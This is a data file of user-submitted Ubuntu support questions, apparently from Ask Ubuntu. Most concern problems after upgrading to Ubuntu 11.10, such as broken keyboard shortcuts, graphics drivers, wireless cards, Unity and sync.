66631	custom keyboard shortcuts to programs not working after upgrade to 11.10 from 11.04	i have an ibm thinkpad x41 tablet , and using this blog : http : //wordsarelies.blogspot.com/2009/05/ubuntu-904-jaunty-on-thinkpad-x41.html i was able to remap the tablet keys ( the buttons right below the screen ) to the unused keycodes 130 , 131 , and 132 . then i was able to assign these keys to xournal , a script that rotates the screen , and cellwriter . after upgrading from 11.04 to 11.10 , pressing these keys no longer started the applications/ rotated the screen . i looked at my keyboard shortcut settings , and it still registered that i was pressing the keys , but would not run the applications . when i switched the shortcut to alt+r ( or anything else on the keyboard ) it activated the programs with no problem . i am at a loss at what to do to make these buttons work again and any help would be greatly appreciated .
66633	where is the restart option ?	i just did a fresh install of 11.10 and noticed that the restart option is missing . is there a way i can put it or turn this option on ?
66637	can the efi system partition be raided ?	i 'm setting up a htpc with ubuntu 64-bit , using uefi and raid with gpt disks . is it possible for the efi system partition ( partition type 0xef00 ) to be part of a raid1 array using mdadm ? i 'm hoping that metadata version 1.0 ( at the end of the disk ) will allow this . also , what should `` device for boot loader installation '' be set too , or does that only apply to mbr disks ?
66641	how to disable windows minimization to the `` activities button '' on gnome ?	i 'm using oneiric with gnome shell and docky . the windows are minimizes to the `` activities '' overview on the panel . how can i get the minimize effect for docky instead to the activities ?
66646	where has `` scientific mode '' gone in gcalctool 6.2.0 ?	ubuntu 11.10 ships gcalctool 6.2.0 . in previous versions the calculator has five models : basic , advance , financial , programming and scientific . however , in this version there are only four options in the menu - i ca n't find the `` scientific model '' . has it been removed , or is it hiding somewhere ?
66648	new applications are opening at different window locations	i am facing this issue on new version of ubuntu 11.10 . when i am opening applications they are opening at different screen locations like right top , right bottom , left bottom etc . please check the screen shot to see the issue . normally when we open an application it should open at the center of the screen . specially i am facing this issue with nautilus . each time i have drag it to the center to work . please suggest solution to resolve this issue .
66649	how to enable the accelorometer in dell inspiron duo	i am considering on getting a dell duo tablet pc . i love the idea of a tablet , but there are some things that just need a physical keyboard ( no the ipad is not immune to this ! ! ) and i hate to have to buy 2 devices , money wise and for passing data back and forth . the only thing that keeps me from committing to the dell duo as a solid ubuntu tablet is that it would suck to have to use an applet to change the orientation of the screen . is there a way to recognize the orientation sensor and configure it ? i am far from a knowledgeable linux user , but i can follow tutorials easily and i learn quickly , and as long as the commands are either simple , or can be copy and pasted , then i do n't mind jumping into a terminal . if i can have it confirmed that this is possible , than this machine will almost undoubtedly be my next portable computing device . only downsides seem to be battery life and the processor ca n't handle 1080p videos . both things i could deal with for a portable machine that can serve multiple purposes : ) p.s . multi-touch has been fixed in 11.10 has n't it ?
66651	permanently set correct monitor resolution instead at the start of each session with xrandr ?	i currently have to , after each time i log in , run xrandr -- addmode vga-1 1600x1200 and then use the display settings tool to set the correct resolution for one of my monitors . also ( not sure if this is the same problem or not ) , during boot up , i do n't see the plymouth screen -- instead , both of my monitors turn off until lightdm comes up . i 'm using the neauvou driver ( or whatever the default is ) and ubuntu 11.10 . so , how can i set the correct resolution for both of my screens from boot ?
66652	windows go blank when resizing	usually it happens when i make a window bigger . i just updated to ubuntu 11.10 . i 'm using an amd athlon and this is my driver 's configuration : ( i remember i removed my video card though ) . any suggestions to fix this ?
66653	can not use meta + d to show desktop	i can not use meta + d to show desktop on a fresh install of ubuntu 11.10 . i have used both the alpha and beta versions and it did n't work in either of those . however , i was expecting it to work in the final release . there is also no mention of any shortcut that shows the desktop .
66654	how to do autoremove when executing apt-get remove ?	i wanted to remove un-used packages together when doing apt-get remove -y xx , but how ? and the solution should not affect apticron auto system updates .
66657	how to detect if appmenu is active ?	is it possible to check from the application if its menu will be displayed in the window or in the panel ( appmenu ) ? i can of course check if the environment is unity , but some people use appmenu in kde or in classic gnome , so i 'm looking for more universal way . i 'll prefer a way suitable for c language and working in ubuntu 11.10 .
66658	how do i install zram ?	how can i install zram on my ubuntu 11.10 acer inspire netbook ? seems like it would be advantageous to use zram . and would it work ?
66666	how can i remove the alt+tab timeout ?	in oneiric there 's a timeout when pressing alt+tab before the icons show . how can i remove that timeout ?
66672	poor peformance with an mobility hd 4250	what i can do for this ? i have so damn laggy and bad performance with ubuntu 11.10 and unity like with 11.04 . ati drivers installed , and sync to vblank is disabled . i really want to use unity , but its so laggy .
66674	after upgrading to 11.10 my lenovo u165 wireless bcm4313 stopped working	my question is similar to this , but now it is about 11.10 . my wireless card : ~ $ lspci -vvnn |grep 14e4 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:0510 ] i followed the instructions on the ubuntu wiki and reinstalled my sta driver but still no luck . i also removed and reinstalled the driver and nothing changed . i am tired rebooting : ) . more info : ~ $ sudo lshw -class network *-network description : ethernet interface product : ar8131 gigabit ethernet vendor : atheros communications physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth1 version : c0 serial : 5c : ff:35:0f : bd:8b size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi duplex=full firmware=n/a ip=192.168.0.106 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:43 memory : d0200000-d023ffff ioport : a000 ( size=128 ) *-network description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory : d0300000-d0303fff ~ $ rfkill list 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no
66675	install options greyed out in software center	i recently installed oneiric , and i am unable to install any software through the software center , because the install option is greyed out for everything . it loads all the software listings alright , but no install button . i tried apt-get update & apt-get upgrade , enabled everything i saw fit in the software sources , yet no luck . installed synaptic through command line , and it installs packages properly . since downloaded .deb packages open through the software center , i ca n't install them because install button is greyed out . any solutions ?
66677	how to create a custom launcher in unity ?	in gnome2 we had this and i do n't see any nearlike option for unity ! i need to create a custom launcher for a propriate program that does n't installed thru deb
66678	software center : package can be found but not installed ?	i 'm trying to look at a package , e.g . emerald themes . it appears in the list but when i go to look at it , this message appears : there is n't a software package called `` emerald '' in your software sources . what software sources do i need to add ? and if they are n't already included then why does the package appear on the list ?
66681	how does ubuntu one sync two machines with identical file content ?	i have a notebook and a desktop computer , both running ubuntu 11.10 . i used to sync between the two with the help of unison , so both computers have identical content in the documents folder . i decided to try ubuntuone . my question is , if i activate ubuntuone for the two machines for the folders with identical contents , will ubuntuone be able to recognise that , or will it sync to the cloud everything twice ( and then down on the other machine ) . to put it another way , will i end up having two copies of everything on the machines and on the cloud , and therefore should delete the identical files on one of the machines before activating ubuntuone , or not . thank you , and if there is already something on the net about this , i 'd be glad if somebody posted the link here .
66683	is there any wa to spin down the gpu fan with the open source drivers for a radeonhd 5870 ?	is there any wa to spin down the gpu fan with the open source drivers for a radeonhd 5870 ? the catalyst 11.9 in 11.10 is just crap , i am happy withthe open source performance but the noise is annoying . i dont run anay games .
66685	ca n't install `` gnome shell ''	when i try to install gnome shell by pressing : apt : //gnome-shell , gnome-themes-standard the software center opens and says : not found there is n't a software package called `` gnome-shell , gnome-themes-standard '' in your current software sources . i tried to switch between `` main server '' , `` server for united states '' and `` server for lithuania '' ( my country ) it did n't work . i also checked `` main '' , `` universe '' , `` restricted '' and `` multiverse '' did n't work either . btw i 'm using an upgraded version from ubuntu 11.04 not a fresh install .
66687	5.1 audio unavailable in vlc	running vlc on ubuntu 11.10 , i am not able to use 5.1 ch output . in windows , whwn i right click , and then choose audio on the contextual menu , i can set the device to 5.1 ch ... . however , in my ubuntu setup , only the audio track selection is active , the audio channel and audio device option are grayed out ... . any suggestions ?
66688	how can i re-open the truecrypt window after it 's been closed ?	i installed truecrypt 7.1 standard 64-bit on a fresh install of ubuntu 11.10 64-bit . after finding the application in the dash i dragged it 's icon onto the unity launcher . i then clicked that icon and truecrypt 's main window opened . i mounted my encrypted file/volume and then closed the window to do some work . to re-open the truecrypt window i would normally click the small blue truecrypt icon that appears on the top panel . in ubuntu 11.10 that icon is no longer there . i receive a message ( `` truecrypt is already running . '' ) if i click on the truecrypt icon in the launcher . how can i re-open the truecrypt window after it 's been closed in ubuntu 11.10 ?
66695	backup and restore my system	hello i would like to backup my system ( aps , data , properties , desktop etc ) in order to restore if i need it i want a full backup . for example i know my android mobile to buck it up ( the rom ) and restore it any time with any change is it possible to do it this in ubuntu ? thanks in advance
66696	ubuntu does n't detect my tv monitor - unknown display	i have a sharp tv which my linux box is plugged into . installing linux is fine , display is visible at the correct resolution etc.. when i turned the machine on the day after it didnt detect the display ? ! i.e . 'no signal ' althought the pc was on . re-install of the os was the only thing i could do . hey presto , display working correctly . however , checking the displays dialogue , monitor is 'unknown ' . this i assume is the problem . i am no programmer ( editing configuration files ) but would have piece of mind if the os recognised the tv monitor for what it is . can anyone help ?
66698	installation error with usb flash drive	after booting from usb from flash drive , loading gets freezed . and after sometime an error is displayed ... '' unable to find medium containing a live file system '' .. what i have to do next ? the os presently using is windows 7 ultimate with 5 partition and processor is corei3 . pls help ... .
66699	some applications are missing their window controls	since updating to 11.10 tonight , window controls for certain applications are missing from the global menu area . so far , gedit and system monitor are affected . they must be closed with a keyboard shortcut or by using quit from their menu . most applications work as expected , with window controls appearing at far left when the global menu bar is moused over . also , perhaps related , dialog boxes open at the top-left corner of the screen and are also missing menu controls or any way to minimize them . screen shot of gedit and a dialog added .
66700	how to fix udev and upower problem	when i 'm charging my my notebook ( sony vaio e series ) and after i 've removed the ac adapter since the charge is complete , the battery always shown that `` fully charged '' so i have write a script to manually do this every time : # ! /bin/bash us=`id -u` if [ $ us ! = 0 ] ; then echo `` non sei root '' exit 1 fi killall upowerd ( /usr/lib/upower/upowerd 1 > /dev/null ) & but this is very annoying ... there is an alternative ? ( like update udev/upower ecc ) ?
66701	how configure workspaces on unity-2d ?	i do n't know what i did exactly , but when my touchpad `` froze '' ( another story ) i started to make random combinations with the keyboard , and seems that accidentally i deleted my workspaces . i had 4 , and now i only have 1 . it 's curious , but on unity-3d , the 4 workspaces still there ( cause it 's use compiz , no ? ) . well , how can i restore my workspaces ? regards . edit : ok , tried to do what says in this thread how to add multiple workspaces in unity 2d ? but do n't work for me : ( on the dconf editor , in the /apps section , it does n't shown /metacity , but i have it installed !
66705	fn+f8 does not switch displays on a dell e6410	i recently upgraded to oneric and found that fn+f8 does not switch displays on oneric , dell e6410 , nvidia . i frequently run presentations and need to switch between projector and laptop with minimum fuss , so this key is important to me ! in maverick , i managed to make it work using acpi_osi=\\\ '' ! windows 2009\\\ '' in grub ( as described here : http : //www.len.ro/2011/01/e6410-summary/ ) . it 's a bit shameful to go into a room of people , plug the laptop and wait 5 minutes to make the change using nvidia-settings . how can i make the fn+f8 work again ? after a bit of debuging with xev it seems that the acpi_osi has some effect but the videoswitch does not take place somewhere else even if /var/log/xorg.0.log shows : [ 24182.812 ] ( ii ) pm event received : capability changed maybe there is some other place where the event is not handled correctly .
66706	wired network `` device not managed ''	i have been having serious problems connecting ubuntu 11.04 to the internet . i have three computer in my office . a macbook , a windows 7 pc & a ubuntu 11.04 pc . on osx and windows both , internet always works just perfectly . on ubuntu , it almost never works and when it does it works super slow . trying to fix this with all the internet problem questions on au , i ended up clicking disconnect from the network button on top right position and restarted the computer . upon restart i am unable to connect at all again . the icon on the top right says : wired network , device not managed . i tried pppoeconf , ended up with : sorry , i scanned 1 interface , but the access concentrator of your provider did not respond . please check your network and modem cables . another reason for the scan failure may also be another running pppoe process which controls the modem . i tried bufferbloat , as one answer suggested . i have tried manual configurations , dhcp ( address only ) , google 's opendns , the other opendns ( the 4.4 one ) . i read somewhere about disabling/blacklisting some old drivers , so the os has to use a new one , but i do n't know how or which driver to blacklist . i do n't know what to do . i have been facing this problem . i called people from my amc but they are all about windows and they did n't know anything about ubuntu . please help . thanks !
66707	differences between the 2 fglrx graphics drivers	i currently installed ubuntu 11.10 and when i am prompted to install additional drivers , i get confused on which to use between the 2 fglrx graphics drivers : ati/amd proprietary fglrx graphics driver ( post-release updates ) ati/amd proprietary fglrx graphics driver these 2 appear but i am not sure what to choose . previously , on 11.04 , only the latter appears ( the one without the post-releae updates ) . what 's the difference between these 2 drivers ?
66716	quanta plus not supported ?	i 'm using ubuntu since very long time , developing web applications . after update to version 11.10 i was very disapointed to see that quanta plus is no longer supported in this version . quanta is only one so powerful web development tool in linux distributions , after you removed it , i ca n't work under ubuntu . did you just forgot to put quanta in repos ? please advice , thanx !
66718	how to manage users and groups ?	just switched from 10.04 to 11.10 . i 'm wondering about the limited options in the gui for managing users and groups . where is the old gui to change groups , id 's , etc . i know that i can do this from cli , that 's no problem . but i want this comfortable gui back .
66721	how to access blocked site ?	in china facebook , youtube , twitter and some more sites are blocked ..so how can we access this sites ? i have tried tor but i do n't know how to use it ... .so please if someone give me full instruction it would be appreciated ... please guys help me i am a new ubuntu user .
66723	how do i modify the options for the power button ?	when i press the power button a dialog opens , but i want to shutdown the system without receiving `` do you really really want to shutdown ? '' . how can i choose a direct shutdown action on a pressed power button ? i had the same problem with the 11.04 version , but i do n't remember the solution and yesterday i upgraded to ubuntu 11.10 .
66728	how do i go back to 11.04 from 11.10 following a failed install	i tried to upgrade 11.04 to 11.10 and ca n't get it to work at all . can i download an 11.04 iso image and re-install . my /home is on a separate drive . i am quite new to linux , 5 or 6 weeks and would really appreciate some constructive help .
66730	dell xps 17 nvidia driver - bumblebee	ok , so first of all , i have the same problem as here : problems with nvidia drivers on dell xps i know what is the problem , and that bumblebee can solve this . my question is : do i have to install only bumblebee , or first the video driver , and then bumblebee ?
66736	grub does n't show up	just installed ubuntu as my only os : /dev/sda1 is my /boot /dev/sda2 is a swap /dev/sda3 is / /dev/sda4 is /home when i reboot after installation grub does n't show up at all . the screen 'blinks ' ( the backlight comes on and goes off ' ) continuously . information : for some reason sudo fdisk -l does n't show any of my partitions . here it is : link here is the result of the 'boot script ' : link here you can see the various partitions . i have tried the steps for grub-install but it did n't work . i am now burning a [ boot-repair ] live usb and i 'll post any updates here .
66737	unity just disappears after changing launcher icon size and wo n't come back	what i did : in a fresh setup of 11.10 , i used compizconfig-settings-manager as explained in this question to change the icon size of the unity launcher . what happened : as soon as i did this , the application froze and the launcher disappeared . i thought , well , maybe unity crashed , so i logged out with ctrl-alt-del , and logged in again . unity still does not appear anymore . i am just left with my desktop background and nautilus running . i can open a new nautilus window , and browse my file system , but that 's about it . what works : i can log into unity 2d , only the `` normal '' unity does not work . so , how do i get unity back ? is there any way to reset the configuration , or look for some more detailed error messages ? what i already tried : starting a terminal and running unity -- reset . it 's stuck at `` initializing session options … done '' , and nothing else happens . starting a terminal and running unity -- replace . same as above . from the 2d mode , calling unity -- replace or -- reset . it hangs after `` starting unity-window-decorator '' , and if i abort the process , my keyboard input is disabled .
66742	`` fatal io error error 11 '' with an ati hd 6470m	my notebook is ati radeon hd 6470m graphics card , amd phenom ii 2 cores . i installed ubuntu 11.10 and ati-driver-installer-11-9-x86.x86_64.run . everything seems normal , but if i use the commands : # glxgears 1980 frames in 5.0 seconds = 395.954 fps 1834 frames in 5.0 seconds = 366.625 fps 1762 frames in 5.0 seconds = 352.316 fps 1807 frames in 5.0 seconds = 361.276 fps 1834 frames in 5.0 seconds = 366.661 fps 1699 frames in 5.0 seconds = 339.716 fps # fgl_glxgears using glx_sgix_pbuffer 1102 frames in 5.0 seconds = 220.400 fps 1016 frames in 5.0 seconds = 203.200 fps 1099 frames in 5.0 seconds = 219.800 fps 982 frames in 5.0 seconds = 196.400 fps 960 frames in 5.0 seconds = 192.000 fps 1100 frames in 5.0 seconds = 220.000 fps xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0.0 '' after 19766 requests ( 19766 known processed ) with 0 events remaining . is there any problems on my ati driver ?
66745	unity 3d not longer working after upgrade on a quadro nvs 140m/	after upgrading unity 3d is not longer working . i tryed several things : unity -- reset re-enabling unity plugin reinstall of ccsm , unity , ... what can i do to get unity working ? unity 2d , gnome sessions works fine . tony @ xllap ~ # /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : quadro nvs 140m/pci/sse2 opengl version string : 3.3.0 nvidia 285.05.09 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes tony @ xllap : ~ $ unity -- reset warning : unity currently default profile , so switching to metacity while resetting the values unity-panel-service : kein prozess gefunden checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done initializing opengl options ... done initializing decor options ... done initializing mousepoll options ... done initializing vpswitch options ... done initializing animation options ... done initializing snap options ... done compiz ( expo ) - warn : failed to bind image to texture initializing expo options ... done initializing move options ... done initializing place options ... done initializing grid options ... done initializing gnomecompat options ... done initializing wall options ... done initializing ezoom options ... done initializing workarounds options ... done initializing resize options ... done initializing fade options ... done initializing unitymtgrabhandles options ... done initializing scale options ... done i/o warning : failed to load external entity `` /home/tony/.compiz/session/106db7534999063ba5131867168837080100000180430006 '' initializing session options ... done error in geis_init screen geometry changed : 1680x0x1920x1080 0x0x1680x1050 unity-panel-service : kein prozess gefunden unity-panel-service : kein prozess gefunden segmentation fault
66746	tomboy saves sync settings , but ubuntu one sync is still disabled	i have just installed 11.10 , after erasing the previous version . on 11.04 i used to sync notes of tomboy with my ubuntu one account . i am trying to do the same now , but when i set the preferences on tomboy , it redirects me on a web page for the login . i enter my username and password and all is ok on the web page . so i should just push `` save '' button on tomboy preferences to finish the process , but it is still disabled . some ideas about the problem ?
66751	how do i set default display brightness ?	is it possible to set the default display brightness so you do n't have to re-adjust it everytime you reboot ? my laptop display is killing my eyes at the login screen already because it starts at 100 % brightness every time .
66752	how can i boot only with unity2d ?	i 'm trying only use unity-2d on 11.10 , have you got any idea about this simple possibility ? thanks !
66753	tomboy can not synchronize since updated to 11.10	i have an annoying problem . since i 've updated my ubuntu installation to 11.10 , i can not synchronize my notes in tomboy anymore . i 'm logged in into u1 notes , and when synchronizing it states that it failed without giving any further explanation . i tried to set up my sync preferences anew , but same results . anyone knows a solution ?
66757	how to install the pantheon desktop environment ?	i want to install pantheon desktop environment from elementaryos on ubuntu , is that possible ?
66758	how do i switch between windows of applications when ` is in a shifted position ?	in the what 's new page for 11.10 it says that alt+` ( grave accent ) can be used to switch between windows of applications : this sounds inconvenient on my keyboard because : ` is shifted ( i have to press shift+´ ( accute accent ) to access it , and ` is located left of backspace ( so it 's far from alt and this makes the combination hard to press with one hand ) . when i press alt+shift+´ , which should be equivalent to pressing alt+` on my keyboard , nothing happens . so , how do i use this feature with my keyboard , that is , how do i switch between windows of applications with my keyboard ?
66760	how do i add downloaded debian packages to synaptic package manager ?	in synaptic , when i click file > add downloaded packages and navigate to the folder with the debian packages , the debian packages are greyed out , which means i can not select them .
66761	sound system is eating away the battery	in my laptop the sound code is running at 100 % even when i am not playing anything . it is causing my palm rest to hit significantly . while i do not face the issue on windows machine where i am using the drivers for idt . here is the output of the powertop . summary : 0.0 wakeups/second , 0.0 gpu ops/second and 0.0 vfs ops/sec usage events/s category description 100.0 % device audio codec hwc0d0 : idt 52.3 ms/s 0.0 process compiz is there any solution to decrease the power consumption of the sound device .
66763	how do i delete files from ubuntu one ?	i 'm brand new to ubuntu one and cloud storage . on my ubuntu 11.04 machine i created an account and uploaded the file with all of my projects to the ubuntu one folder ( not the shared with me folder ) . then deleted it with a right-click `` move to trash '' . later i downloaded the ubuntu one app to my windows 7 machine and was surprised to see the folder show up there . so now its gone from 11.04 but shows on windows 7 . how do i remove it completely from the cloud forever so that nobody anywhere can access it ?
66765	how do i install virtualbox 4.1 ?	how to install virtualbox-4.1.4 in ubuntu 11.04 fluently ? when apt-get install libqt* unmet dependency . there is a long list of unmet dependency . where start first and any command to install virtualbox fluently ? you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : virtualbox-4.1 : depends : libcurl3 ( > = 7.16.2-1 ) but it is not going to be installed depends : libqt4-network ( > = 4:4.5.3 ) but it is not going to be installed depends : libqt4-opengl ( > = 4:4.7.0~rc1 ) but it is not going to be installed depends : libqtcore4 ( > = 4:4.7.0~beta1 ) but it is not going to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but it is not going to be installed recommends : libsdl-ttf2.0-0 but it is not going to be installed recommends : dkms but it is not going to be installed recommends : libhal1 ( > = 0.5 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
66767	how to redirect a sub domain to any url ( apache2 & ubuntu )	i want to redirect my 'http : //www.mysite.com ' to 'http : //www.newdomain.com/login.html ' on apache2.please help me , how to do that.i am not getting how to use rewritecond & rewriterule.please help .
66769	why does tar . see hidden files but ls . does not ?	why does tar cvpfz /tmp/backup.tgz . backup hidden files ? ( note ls . does not see the hidden files . trivia : there are ways to see hidden files such as with ls -a but this is just trivia . the question pertains to a difference in the behaviour when similar behaviour might be expected . )
66771	block and unblock access to certain domains	how can i block complete access of my computer to certain domains but be able to switch it on whenever i want to ? that is , i want that by default whenever my browser or any other application hits a page of the form http : //something.domain.com , or a page who is somehow connecting me to http : //something.domain.com â that it blocks it and do n't send anything without my explicit consent . i know we can block something completely by using hosts , but the trouble is that i may need to check these domains once in a while , so i would have to keep removing and adding it to hosts . which is ok if i can refresh it somehow , or have a script do it quickly for me . is there a simple way to do it ? i have the impression it can be done with iptables , but this is a subject i am not familiar with .
66774	show/hide user list at login ?	hy ! how can i hide/show user list at login screen ? thank you for answers !
66777	pc logs off instead of shuts down	iâve upgraded to ubuntu 11.10 but i have a problem with shutdown . when i turn off my pc it do the logout instead the shutdwon . when arrive to violet screen ( login ) than i can shutdown my pc and all is ok .
66779	my computer will no longer suspend or shut off when i close the lid	this is somewhat annoying . i have an old laptop and the screen on it is shot , so now i have an old monitor hooked up and it works fine . before the upgrade i had it set so that when i closed the lid on the laptop everything would shutdown or suspend , when i lift the lid , everything would come back . now , however , when i close the lid nothing happens , when i open the lid the screen flashes black and comes back . i have it set so that it should suspend when i close the lid . it 's confusing ...
66780	11.04 - > 11.10 update problems ( power , display , resolution )	i have serious issues with ubuntu ( 64 bit ) after upgrading system from 11.04 to 11.10 . my hardware : asus g53sw ( i7-2630qm , 8gb ram , gf gtx460m ) power ( upower ) - when i change behaviour of lid open/close looks like my settings does n't work at all . changed closed lid to do nothing and still my notebook suspends when i close the lid , resolution - system hangs when i try to change resolution . something weird happens and screen ( just before hangs ) looks like having a shifted position ( like absolute with shift ) , display - when i attach external display ( with adaptor ring , dvi - > hdmi ) and trying to turn it on as separate screen / twin view system hangs on with similiar effects as stated in 2nd point . everything worked well on ubuntu 11.04 , so it 's 11.10 issue for sure . bonus question : how can i change behaviour of special keys like keyboard backlight ? acpi_listen does n't list them , i read that it 's something with wmi .
66783	the chrome .deb not working with the new software center ?	i downloaded the .deb twice . i double click on it , the software center opens and it says `` internal error '' please help .
66785	how can one unlock a fully encrypted ubuntu 11.10 system over ssh at boot ?	in previous versions of ubuntu , and current versions of debian , you can unlock a fully encrypted system ( using dmcrypt and luks ) at boot time over ssh . it was as easy as : installing the encrypted system using the ubuntu alternate installer disk or normal debian installer disk and choosing to encrypt the system . after the system is installed , adding the dropbear and busybox packages . updating the initram-fs to authorize your ssh key . at boot time , you 'd just ssh to the machine , and do : echo -ne `` keyphrase '' > /lib/cryptsetup/passfifo the machine would then unlock and boot the encrypted system . using the exact same steps on ubuntu 11.10 , i can ssh to the machine , but /lib/cryptsetup/passfifo does n't exist . there appears to be no way to unlock the system over ssh . i 'm not sure where to look to see if this functionality changed or if it was removed .
66786	how to disable login sound ?	howâ do i disable the login sound ? i have tried all guides on the internet i can find , but they are for previous versions and i ca n't find an option anywhere .
66791	ok , close button not visible by default	i have installed ubuntu 11.10 on hp mini and most of the times the ok , cancel buttons at the bottom are not visible . i have to maximize the windows to make them visible . how to change this ?
66797	what is the easiest way to send a file ?	what is the easiest way to send a file : from an ubuntu machine , to another ubuntu user ( if also to others even better ) who is out of your local network , through an encrypted file transfer , using only free and open source software , preferably not depending on third parties like cloud apps where you have to upload the file , preferably not revealing your ip address and not making your machine in any way more vulnerable to the receiver of the file . how to quickly set it up ?
66798	keyboard shortcuts working differently	in natty i had my keyboard shortcuts configured to use most of the numbers on the numerical pad on the right side of my keyboard , e.g . 8 turned volume up , 2 down , 4 previous track , 6 next track , 1 play/pause and 0 to launch default media player . since i installed oneric i went into keyboard shortcuts and set them all to the same keys but now none of them work , any ideas why ? i 've also tried using number lock but that hasnt worked either .
66799	if i am behind a router , how do i edit dns resolution ?	should i edit resolv.conf in my machine , or leave it 192.168.1.x and change something in the router ? if in the router , how ?
66801	how to reduce the size of all gnome-shell icons ?	is it me or is the size of icons in gnome 3.2 huge ? it makes my 1200*800 resolution look like a netbook interface . please how do i reduce icons size ?
66802	why does n't the libreoffice icon appear on my launcher when running ?	when we run an application , its icon would appear on the launcher and so we can call it back after minimize it . specially , a little triangle would kepp appearing near the icon , meaning this application is running now . howver , when i open a libreoffice file , the revelance icon does n't appear on the launcher ! what 's more , when i minimize libreoffice , i could n't find it even through `` alt+tab '' . i 've tried libreoffice 3.4 and 3.3 , but the problem exists all the same look , here is libreoffice calc running , and no icon appears on the launcher . if i minimize it , it it impossible to call it back
66808	portugese layout is partially incorrect	i upgraded to oneiric ocelot , and the portuguese layout is partially incorrect . how can i correct this ?
66810	very slow connection on an intel ( r ) wifi link 5100 agn	so my wi-fi card is a intel 5100 agn and so far doesnt works . if anyone managed to make it work give me any hint . ubuntu user : ) tried disabling ipv6 - no result
66811	ca n't play .mkv files	im using a an acer aspire revo r1600 and for some odd reason with this new version of ubuntu i ca n't play .mkv files anywhere . i have always had flawless playback but now im getting a weird message from the video player . `` could not find gstreamer caps mapping for ffmpeg codec 'h264 ' , and you are using an external libavcodec . this is most likely due to a packaging problem and/or libavcodec having been upgraded to a version that is not compatible with this version of gstreamer-ffmpeg . make sure your gstreamer-ffmpeg and libavcodec packages come from the same source/repository . '' i tried installing the restricted extras and playing it back in vlc but in vlc i just get a green picture and thats all .
66812	how to add folders in launcher ?	in others ubuntus you could just press right mouse and add launcher . in ubuntu 11.10 , i ca n't do that . so , how can i add folders and files in ubuntu 11.10 launcher ?
66815	workspaces do n't work on my system	it shows only one workspace when i click on workspaces icon , what should i do ?
66816	how does all components of os ubuntu 11.04 intergrate and work together	i am a student of a computer science . i need os level details of ubuntu 11.04 . how does all parts of this os work ?
66820	how to increase internet speed ? big problem	i need help because when i 'm downloading with ubuntu 11.10 by firefox or uget max speed is 8kb while by ubuntu software center is 70kb ! what should i do ? is there any code to fix it ?
66822	lubuntu desktop environment wo n't accept password	i 've installed the `` lubuntu desktop environment '' from the ubuntu software center , and then rebooted . the new interface asked for a username and password , but apparently would n't accept any combinations of usernames or passwords which worked before . i 've reinstalled ubuntu since then , but i 'm just curious about what i did wrong and what i could have done to fix things , for future reference . thank you~
66824	help ! my wallpaper is broken after installing pantheon shell ?	earlier today , i installed pantheon shell , and got an unpleasant surprise . my wallpaper does n't work ! it does n't work in either pantheon , gnome 3 fallback , and unity 2d . instead , the background is gray , and i ca n't get rid of it . what do i do ?
66831	mediatomb autostart does n't work	mediatomb works fine when starting manually but the autostart does n't work . in the wiki it says it should start automatically at system start , but it does n't . tryed many things but still does n't work any ideas ? ?
66832	two battery gadgets showing on ubuntu 11.10	i just upgraded my ubuntu from 11.04 to 11.10 yesterday and i 'm really annoyed about the battery status gadgets that are shown on the notification area , they show exactlly the same information and i cant remove neither of them . how do i edit the notification area icons on this new version of ubuntu ? ps : i never tried to change them on 11.04 because i never needed to .
66833	audio shortcuts stopped working in clementine	i 've upgraded my ubuntu to oneric and my audio shortcuts are blocked . i use clementine and before upgrading everything works fine . but now , once i want to use my shortcuts a huge blocked sign appear in my screen .
66834	how to remove one of my installations ?	i installed ubuntu 8.10 one month ago then installed ubuntu 11.04 two weeks later . now i wan na remove one of them ( ubuntu 8.10 ) . how can i do that .
66835	where can i report a bug for apps.ubuntu.com ?	i have a few bugs which i would like to patch for apps.ubuntu.com ; however , i ca n't seem to find their project page on launchpad . where can i get in touch with this team and where can i pull the code from ?
66836	how do i make my hp g62 function keys work ?	i 've just installed ubuntu 11.10 ( but this problem also appears at 11.04 ) , on my hp g62 laptop , and unfortunately none of the function keys work . volume , brightness etc , how can i made them work under ubuntu ?
66843	how to change mouse cursor and theme ?	how can i change x11 cursor and theme in the newest ubuntu ? i ca n't find it . please help .
66848	lenovo b570 broadcom corporation bcm4313 wireless does n't work	prumar @ bluelaptop : ~ $ rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 2 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) subsystem : broadcom corporation device [ 14e4:051b ] i do n't know what to do . i am really upset , because after trying everything the issue still remain . please , do anyone can help me ?
